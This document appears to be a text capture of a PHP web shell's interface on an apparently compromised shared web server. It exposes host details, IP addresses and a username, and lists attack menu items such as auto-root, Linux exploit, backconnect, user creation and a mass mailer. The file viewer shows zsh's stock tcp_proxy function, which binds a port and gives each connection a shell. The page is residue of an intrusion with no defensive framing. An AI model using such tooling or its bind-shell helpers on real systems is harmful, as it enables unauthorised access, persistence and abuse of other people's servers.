Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
zsh /
functions /
TCP /
[ HOME SHELL ]
Name
Size
Permission
Action
tcp_alias
4
KB
-rw-r--r--
tcp_close
2.91
KB
-rw-r--r--
tcp_command
68
B
-rw-r--r--
tcp_expect
4.98
KB
-rw-r--r--
tcp_fd_handler
970
B
-rw-r--r--
tcp_log
2.23
KB
-rw-r--r--
tcp_open
6.63
KB
-rw-r--r--
tcp_output
1.81
KB
-rw-r--r--
tcp_point
443
B
-rw-r--r--
tcp_proxy
849
B
-rw-r--r--
tcp_read
6.89
KB
-rw-r--r--
tcp_rename
850
B
-rw-r--r--
tcp_send
1.94
KB
-rw-r--r--
tcp_sess
1.01
KB
-rw-r--r--
tcp_shoot
324
B
-rw-r--r--
tcp_spam
2.84
KB
-rw-r--r--
tcp_talk
1.44
KB
-rw-r--r--
tcp_wait
459
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tcp_proxy
# Listen on the given port and for every connection, start a new # command (defaults to $SHELL) in the background on the accepted fd. # WARNING: this can leave your host open to the universe. For use # in a restricted fashion on a secure network. # # Remote logins are much more efficient... local TCP_LISTEN_FD trap '[[ -n $TCP_LISTEN_FD ]] && ztcp -c $TCP_LISTEN_FD; return 1' \ HUP INT TERM EXIT PIPE if [[ $1 != <-> ]]; then print "Usage: $0 port [cmd args... ]" >&2 return 1 fi integer port=$1 shift ztcp -l $port || return 1 TCP_LISTEN_FD=$REPLY (( $# )) || set -- ${SHELL:-zsh} local cmd=$1 shift while ztcp -a $TCP_LISTEN_FD; do # hack to expand aliases without screwing up arguments eval $cmd '$* <&$REPLY >&$REPLY 2>&$REPLY &' # Close the session fd; we don't need it here any more. ztcp -c $REPLY done
Close